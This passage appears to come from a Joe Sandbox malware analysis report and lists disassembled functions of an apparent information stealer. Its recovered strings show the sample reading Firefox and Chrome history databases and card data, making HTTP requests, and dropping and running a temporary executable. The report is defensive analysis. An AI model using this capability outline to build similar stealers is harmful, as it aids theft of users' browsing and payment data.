                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Http$CloseHandle$DataHeapOpenOptionQueryRequest$AvailableConnectCrackFreeProcessReadReceiveResponseSend
                                                                                                        • String ID: <r;r$?r r$?r r
                                                                                                        • API String ID: 199669925-2032818692
                                                                                                        • Opcode ID: 0b141f4ef8d4016b1e19e9079c619bf54350b44abf148a21e1f648eab4ef3e29
                                                                                                        • Instruction ID: ab389403399bc8b874b87e81b128a2ceef972163cb5023a43b0f82f0d51b0cae
                                                                                                        • Opcode Fuzzy Hash: 0b141f4ef8d4016b1e19e9079c619bf54350b44abf148a21e1f648eab4ef3e29
                                                                                                        • Instruction Fuzzy Hash: 1DA1D072B1938196EB50EF66A4441AEB7A1FB8AB90F944035EF4D03B48DF7CE405DB50
                                                                                                        Function 00007FF7327AFB38 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 65stringfileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$lstrcat$Close$FindHandleHeapView__memcpylstrlen$ByteCharCreateEnvironmentExistsFirstFreeMappingMultiOpenPathProcessSizeUnmapVariableWidelstrcpy
                                                                                                        • String ID: *.default-release$APPDATA$\places.sqlite
                                                                                                        • API String ID: 4154822446-3438982840
                                                                                                        • Opcode ID: 58731acea2be65af64effc114e10444d7d779a37d10e10a89ac114ba9e3e4df9
                                                                                                        • Instruction ID: 063050785dc32ff41157c1334470234e919aaf7b6f998bdf688af23af41d6697
                                                                                                        • Opcode Fuzzy Hash: 58731acea2be65af64effc114e10444d7d779a37d10e10a89ac114ba9e3e4df9
                                                                                                        • Instruction Fuzzy Hash: E431C321A18947A1EB10EF20E8401E9B320FF59794FC04031DB5E476A8EFBDE609D760
                                                                                                        Function 00007FF7327AB428 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 310COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Card$CardsFreeListMemory$ChangeStatus
                                                                                                        • String ID: "_": ""$%02X
                                                                                                        • API String ID: 2879528921-1880646522
                                                                                                        • Opcode ID: f58cb8d867edc302733c4dd72276039138ff666b7cd7c17fd6ea8167122b3296
                                                                                                        • Instruction ID: 21ca58cb02e72b0905182ce2ac6ce716b0e12d33a2d0dbfca80c52cf0d50ab5c
                                                                                                        • Opcode Fuzzy Hash: f58cb8d867edc302733c4dd72276039138ff666b7cd7c17fd6ea8167122b3296
                                                                                                        • Instruction Fuzzy Hash: D6D16D26B1864364FA80FB62A8511FD9365BF5BBD4BC46031EE1F06796DEACF105E320
                                                                                                        Function 00007FF7327A78EC Relevance: 6.1, APIs: 4, Instructions: 56libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Process$AddressCurrentLibraryLoadProcWow64
                                                                                                        • String ID:
                                                                                                        • API String ID: 4035193891-0
                                                                                                        • Opcode ID: 8f7d0afc07ad77c62296da18ea9598441e0f30d9eecd5f53e8fc3d6832e69a3e
                                                                                                        • Instruction ID: de44109766ca5a433f8018cb3c148a6ea39356bb4c1c1898271b7f32262c52d6
                                                                                                        • Opcode Fuzzy Hash: 8f7d0afc07ad77c62296da18ea9598441e0f30d9eecd5f53e8fc3d6832e69a3e
                                                                                                        • Instruction Fuzzy Hash: 0021D162A187C197EB506F21A4441BEE790FB9EB90F844235DBCD02B46DFACE104DB20
                                                                                                        Function 00007FF7327A36F0 Relevance: 3.1, APIs: 2, Instructions: 58encryptionCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CryptExport$HeapProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 532797600-0
                                                                                                        • Opcode ID: 7e4aefc5a259160d3bd96176410f5e013c34f79a57299891ee72d5de0e9a384b
                                                                                                        • Instruction ID: f03bbb0b5c03856a67544799c2737291183697f1cd3e842d9bde5d183802baf8
                                                                                                        • Opcode Fuzzy Hash: 7e4aefc5a259160d3bd96176410f5e013c34f79a57299891ee72d5de0e9a384b
                                                                                                        • Instruction Fuzzy Hash: E621A332A19642A2EB90EF11F460369B3A0FB9ABA4F408130DB5D47794DF7CE401DB10
                                                                                                        Function 00007FF7327AA520 Relevance: .2, Instructions: 199COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a1863eed8ba9e8c0bfa6a5baf2a0f20c0091597ec27319fbadb4e1ca4e021892
                                                                                                        • Instruction ID: 481a66892ac6a1ff886122a856684a1032e27fe86813440fc520813ea436e825
                                                                                                        • Opcode Fuzzy Hash: a1863eed8ba9e8c0bfa6a5baf2a0f20c0091597ec27319fbadb4e1ca4e021892
                                                                                                        • Instruction Fuzzy Hash: AE616953A082D15AE745AE3981512FE6BA1FB1B798F840174EF8943B87D9ACE407D320
                                                                                                        Function 00007FF7327AA778 Relevance: .2, Instructions: 165COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 25ce122ab1a22b4c820431336851b8b198527fbfb5a646098f74e5a8227e0d2d
                                                                                                        • Instruction ID: 33643d1cec038cb4585bcbc43cf9890cb0c1971d5d8115e5c9b246d8641b3252
                                                                                                        • Opcode Fuzzy Hash: 25ce122ab1a22b4c820431336851b8b198527fbfb5a646098f74e5a8227e0d2d
                                                                                                        • Instruction Fuzzy Hash: A9516503A083C15CEB169E3980923ED6F61FB2A3A8F860035EF9957B47D52CE00BD320
                                                                                                        Function 00007FF7327AFF3C Relevance: 18.1, APIs: 12, Instructions: 91filestringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$Heap$Process$CloseHandleViewlstrlen$ByteCharCreateExistsFreeMappingMultiOpenPathSizeUnmapWide__memcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 2161876737-0
                                                                                                        • Opcode ID: e6ac3f6210a3834a1ca4de31d5e0d4b22d655f4258524774f1a89776c1876d7c
                                                                                                        • Instruction ID: c293e30cfab8687f8bcfe371578813b8431bb2c8d1c1767215679adf57f56a19
                                                                                                        • Opcode Fuzzy Hash: e6ac3f6210a3834a1ca4de31d5e0d4b22d655f4258524774f1a89776c1876d7c
                                                                                                        • Instruction Fuzzy Hash: 1E31B521A0864292E724EB26A85877AB391FB9EFE0F944234DF5E037A4DF7CE405D710
                                                                                                        Function 00007FF7327A1CBC Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 65filetimeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$Time$CloseCreateExecuteHandlePathShellSystemTempWritewsprintf
                                                                                                        • String ID: %08X.exe$open
                                                                                                        • API String ID: 2307396689-1771423410
                                                                                                        • Opcode ID: 8de0e536810cab89fbb532c5864f35491e90b95316bd22bc7e796462d49f8046
                                                                                                        • Instruction ID: cbb4d6875c68fd53d4cf254f689f0e5609d8168928e0246623310b1f87e2e86e
                                                                                                        • Opcode Fuzzy Hash: 8de0e536810cab89fbb532c5864f35491e90b95316bd22bc7e796462d49f8046
                                                                                                        • Instruction Fuzzy Hash: 5831B872618985A6E760DF21E8847E9A321FB8D788F804135DB4D47A58DF7CD60DC710
                                                                                                        Function 00007FF7327AF988 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 96stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$lstrcatlstrlen$CloseHandleHeapView__memcpy$ByteCharCreateEnvironmentExistsFreeMappingMultiOpenPathProcessSizeUnmapVariableWide
                                                                                                        • String ID: Default$LOCALAPPDATA$\History
                                                                                                        • API String ID: 3980575106-3555721359
                                                                                                        • Opcode ID: b2e06d87f8ff40b3d8686b8cb712bef1c7a21b8d3f7f2d2d70081e66541f2c80
                                                                                                        • Instruction ID: 161bcf64de1adb98e6caa27b9a5a772aa84c1330b6e0a6082fc4f8e842cce2ef
                                                                                                        • Opcode Fuzzy Hash: b2e06d87f8ff40b3d8686b8cb712bef1c7a21b8d3f7f2d2d70081e66541f2c80
                                                                                                        • Instruction Fuzzy Hash: C6516522E18F8592E750EF24D9012E87370FBA9784F85A221DB8D53666EF74F6D9C340
                                                                                                        Function 00007FF7327AFC70 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 89comCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateInitializeInstanceUninitialize
                                                                                                        • String ID: http
                                                                                                        • API String ID: 948891078-2541227442
                                                                                                        • Opcode ID: 53a529b8281706a7cfbc275746c8919f0409a2c91395af22e531bc4e924174c6
                                                                                                        • Instruction ID: a58f765ae214c2b165240bd356a142c958724292711b65321c94489cea9db8b1
                                                                                                        • Opcode Fuzzy Hash: 53a529b8281706a7cfbc275746c8919f0409a2c91395af22e531bc4e924174c6
                                                                                                        • Instruction Fuzzy Hash: 6641A132B09A42A5E750AF36D4503E9A7A0FF89B88F404132DB0E4BB68DF7CE145D710
                                                                                                        Function 00007FF7327A9478 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 81timesynchronizationCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Time$FileProcessSystem$CloseCodeExitHandleNamedObjectPeekPipeSingleTerminateWait
                                                                                                        • String ID: exit
                                                                                                        • API String ID: 1626563136-1626635026
                                                                                                        • Opcode ID: e8db0668784a4e42b00b615d6c0ccb33bfa89d96bba3dbda8ec61e812724d3ba
                                                                                                        • Instruction ID: 0e6a76dc2fe7078505155fb91561ab8b642fe958c07115221ec5568a3a371d6c
                                                                                                        • Opcode Fuzzy Hash: e8db0668784a4e42b00b615d6c0ccb33bfa89d96bba3dbda8ec61e812724d3ba
                                                                                                        • Instruction Fuzzy Hash: F9318522A08542E1EBC0FF35D450179A3A1FF9AB94FD41031EB0E86699DFACF855E720
                                                                                                        Function 00007FF7327A1EEC Relevance: 12.2, APIs: 8, Instructions: 152commemoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Create$ArrayFileSafe$DataStringTime$AccessAllocCloseExecuteFreeHandleInitInitializeInstancePathShellSystemTempUnaccessVariantVectorWritewsprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 1750269033-0
                                                                                                        • Opcode ID: 35f14d03cfaf8c97af958c557d0a79d7db1ea00b24c4592062ca6e010514b8e8
                                                                                                        • Instruction ID: 5fd5126c9e9e0b5dbf1874c40ab49c08b278a9cde952fc1b33dd932f54131cb8
                                                                                                        • Opcode Fuzzy Hash: 35f14d03cfaf8c97af958c557d0a79d7db1ea00b24c4592062ca6e010514b8e8
                                                                                                        • Instruction Fuzzy Hash: B0614B22B08A06A5EB04EF65D4543ED63A0FB49F88F848031CF0E87B58DE79E509D360
                                                                                                        Function 00007FF7327AECBC Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00007FF7327A25DC: GetProcessHeap.KERNEL32(?,?,?,00007FF7327A1985,?,?,?,00007FF7327A155F), ref: 00007FF7327A25E5
                                                                                                        • __memcpy.DELAYIMP ref: 00007FF7327AED43
                                                                                                          • Part of subcall function 00007FF7327B0114: __memcpy.DELAYIMP ref: 00007FF7327B0145
                                                                                                          • Part of subcall function 00007FF7327B0114: __memcpy.DELAYIMP ref: 00007FF7327B0153
                                                                                                          • Part of subcall function 00007FF7327AEB94: lstrlenA.KERNEL32 ref: 00007FF7327AEBB1
                                                                                                          • Part of subcall function 00007FF7327A25B4: GetProcessHeap.KERNEL32 ref: 00007FF7327A25C1
                                                                                                          • Part of subcall function 00007FF7327A25B4: HeapFree.KERNEL32 ref: 00007FF7327A25CF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Heap__memcpy$Process$Freelstrlen
                                                                                                        • String ID: last_visit_time$table$url$urls
                                                                                                        • API String ID: 2336645791-3896411411
                                                                                                        • Opcode ID: d5d9a79c7b40b120fcd0d5f95854f23203b021debaa7a14ff8f866156a15b791
                                                                                                        • Instruction ID: cf297d38b9eaa77b0940d91d380931b00e79ee082de57e5817b5d914ea773780
                                                                                                        • Opcode Fuzzy Hash: d5d9a79c7b40b120fcd0d5f95854f23203b021debaa7a14ff8f866156a15b791
                                                                                                        • Instruction Fuzzy Hash: 5831A722A1D68262EAA0EB26E4401BEE350FF8ABD0F804031DF4D47795EEBCF455E750
                                                                                                        Function 00007FF7327AEEDC Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00007FF7327A25DC: GetProcessHeap.KERNEL32(?,?,?,00007FF7327A1985,?,?,?,00007FF7327A155F), ref: 00007FF7327A25E5
                                                                                                        • __memcpy.DELAYIMP ref: 00007FF7327AEF63
                                                                                                          • Part of subcall function 00007FF7327B0114: __memcpy.DELAYIMP ref: 00007FF7327B0145
                                                                                                          • Part of subcall function 00007FF7327B0114: __memcpy.DELAYIMP ref: 00007FF7327B0153
                                                                                                          • Part of subcall function 00007FF7327AEB94: lstrlenA.KERNEL32 ref: 00007FF7327AEBB1
                                                                                                          • Part of subcall function 00007FF7327A25B4: GetProcessHeap.KERNEL32 ref: 00007FF7327A25C1
                                                                                                          • Part of subcall function 00007FF7327A25B4: HeapFree.KERNEL32 ref: 00007FF7327A25CF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Heap__memcpy$Process$Freelstrlen
                                                                                                        • String ID: last_visit_date$moz_places$table$url
                                                                                                        • API String ID: 2336645791-66087218
                                                                                                        • Opcode ID: f9355e031720a999b2833bedf3602efa1e9d778dc8acbfa60e7b4b373426d685
                                                                                                        • Instruction ID: 12f89d51fd89f4c3e2ad465ad35f16e4b8edbb99de4fdc8f9ab9442430590c88
                                                                                                        • Opcode Fuzzy Hash: f9355e031720a999b2833bedf3602efa1e9d778dc8acbfa60e7b4b373426d685
                                                                                                        • Instruction Fuzzy Hash: 7631B82260974261EAA4FB26E4411AAA350FF9ABD0FC04132DF4E47795EEBDF447E710
                                                                                                        Function 00007FF7327AF108 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00007FF7327A25DC: GetProcessHeap.KERNEL32(?,?,?,00007FF7327A1985,?,?,?,00007FF7327A155F), ref: 00007FF7327A25E5
                                                                                                        • __memcpy.DELAYIMP ref: 00007FF7327AF18F
                                                                                                          • Part of subcall function 00007FF7327B0114: __memcpy.DELAYIMP ref: 00007FF7327B0145
                                                                                                          • Part of subcall function 00007FF7327B0114: __memcpy.DELAYIMP ref: 00007FF7327B0153
                                                                                                          • Part of subcall function 00007FF7327AEB94: lstrlenA.KERNEL32 ref: 00007FF7327AEBB1
                                                                                                          • Part of subcall function 00007FF7327A25B4: GetProcessHeap.KERNEL32 ref: 00007FF7327A25C1
                                                                                                          • Part of subcall function 00007FF7327A25B4: HeapFree.KERNEL32 ref: 00007FF7327A25CF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Heap__memcpy$Process$Freelstrlen
                                                                                                        • String ID: last_visit_time$table$url$urls
                                                                                                        • API String ID: 2336645791-3896411411
                                                                                                        • Opcode ID: e545b317cdac597c395dbcae4aa48d93bb7f4768476dea28865c2df9a88b3085
                                                                                                        • Instruction ID: 1a961135c200279a029bf47a958f5dbef472aea9eb9d1b4770ca0926d445f449
                                                                                                        • Opcode Fuzzy Hash: e545b317cdac597c395dbcae4aa48d93bb7f4768476dea28865c2df9a88b3085
                                                                                                        • Instruction Fuzzy Hash: 9831BA2160D782A1EAA0FB26E4401AAA350FF8ABD0F808031DF5D47795EEBDF546E751
                                                                                                        Function 00007FF7327AE3AC Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 64stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmpDownload File
